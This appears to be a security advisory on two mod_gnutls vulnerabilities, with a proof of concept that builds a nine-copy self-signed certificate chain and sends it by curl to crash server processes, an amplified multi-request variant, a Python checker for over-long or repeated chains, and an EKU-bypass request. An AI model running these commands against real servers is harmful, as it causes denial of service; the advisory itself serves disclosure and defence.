mod_gnutls Multiple Vulnerabilities
Multiple vulnerabilities exist in mod_gnutls.
CVE-2026-33307 Stack-based Buffer Overflow in Client Certificate Chain Processing
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (7.5)
A client certificate chain with more than 8 certificates can cause a stack-based buffer overflow. The certificate chain does not need to lead to a trusted root, or even be a well-formed chain – the same certificate can be used multiple times.
Proof of Concept:
The following steps demonstrate the vulnerability on a Fedora 42 system running mod_gnutls 0.12.0.
1. The attacker generates a self-signed certificate:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -sha256 -days 365 -noenc -subj "/CN=self-signed-cert"
Please note there are no particular requirements for the contents of this certificate.
2. The attacker generates a malicious certificate chain by using 9 copies of the same certificate generated above:
cat cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem > malicious-cert-chain.pem
3. The attacker initiates an mTLS connection using the crafted certificate chain:
curl https://<hostname> -k --key key.pem --cert malicious-cert-chain.pem
4. The following entry can be found in the /var/log/httpd/error_log file on the server:
*** stack smashing detected ***: terminated
[…] [core:notice] [pid 1183:tid 1183] AH00051: child pid 3449 exit signal Abort (6), possible coredump in /etc/httpd
The above confirms that the stack-based buffer overflow was detected and the protections kicked in: the process was aborted, and a core dump was generated. This largely reduces this vulnerability to a transient DoS, thanks to the hardening.
This attack can easily be amplified by issuing several requests at once:
curl https://<hostname> https://<hostname> https://<hostname> https://<hostname> -k --key key.pem --cert malicious-cert-chain.pem
This vulnerability can lead to a potential DoS through attacker-controlled CPU, memory and disk usage, despite the protections in place.
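As an added example that is not part of the advisory or of mod_gnutls itself, the following Python helper audits a PEM client-certificate bundle for the two properties of the crafted chain described above: more than 8 certificates, and the same certificate repeated. The 8-certificate limit comes from the advisory; the PEM samples are constructed placeholders, not real certificates, since the check only needs the base64 bodies.

```python
import base64
import hashlib
import re

# Limit stated in the advisory: chains longer than 8 certificates overflow the stack buffer.
MAX_CHAIN_LEN = 8

PEM_CERT_RE = re.compile(
    r"-----BEGIN CERTIFICATE-----\s*(.*?)\s*-----END CERTIFICATE-----", re.S
)


def parse_pem_chain(pem_text: str) -> list[bytes]:
    """Return the DER bytes of each certificate block in a PEM bundle, in order.
    Whitespace inside the base64 body is tolerated, as OpenSSL tolerates it."""
    ders = []
    for body in PEM_CERT_RE.findall(pem_text):
        ders.append(base64.b64decode(re.sub(r"\s+", "", body), validate=True))
    return ders


def analyse_chain(pem_text: str, max_len: int = MAX_CHAIN_LEN) -> dict:
    """Summarise a client chain: length, number of distinct certificates,
    repeated certificates (by SHA-256 fingerprint) and whether the chain
    exceeds the length the vulnerable code can handle."""
    ders = parse_pem_chain(pem_text)
    counts: dict[str, int] = {}
    for der in ders:
        fp = hashlib.sha256(der).hexdigest()
        counts[fp] = counts.get(fp, 0) + 1
    return {
        "length": len(ders),
        "unique": len(counts),
        "duplicates": {fp: n for fp, n in counts.items() if n > 1},
        "too_long": len(ders) > max_len,
    }


def pem_block(payload: bytes) -> str:
    """Wrap arbitrary bytes as a PEM CERTIFICATE block (constructed test data only)."""
    b64 = base64.b64encode(payload).decode()
    return f"-----BEGIN CERTIFICATE-----\n{b64}\n-----END CERTIFICATE-----\n"


# Constructed samples: a normal two-certificate chain and a 9-copy chain of one cert.
SAMPLE_BENIGN_CHAIN = pem_block(b"leaf (constructed)") + pem_block(b"issuer (constructed)")
SAMPLE_LONG_CHAIN = pem_block(b"self-signed (constructed)") * 9

if __name__ == "__main__":
    for name, chain in (("benign", SAMPLE_BENIGN_CHAIN), ("long", SAMPLE_LONG_CHAIN)):
        print(name, analyse_chain(chain))
```

Run it over a chain captured from a reverse proxy or from your own PKI's issued bundles to confirm that legitimate client chains stay within the limit; a chain that is both over-long and made of repeated certificates matches the pattern the advisory describes.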
CVE-2026-33308 Improper Certificate Validation
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N (6.8)
A client certificate with an incorrect Extended Key Usage (EKU) is accepted. If an attacker compromises a certificate (with its associated private key) that was issued for a different purpose (e.g. server authentication), they may be able to reuse it for mTLS client authentication.
Proof of Concept:
The attacker makes an HTTPS request using a separately acquired private key and certificate chain:
curl https://<hostname> -k --key key.pem --cert not-client-cert-chain.pem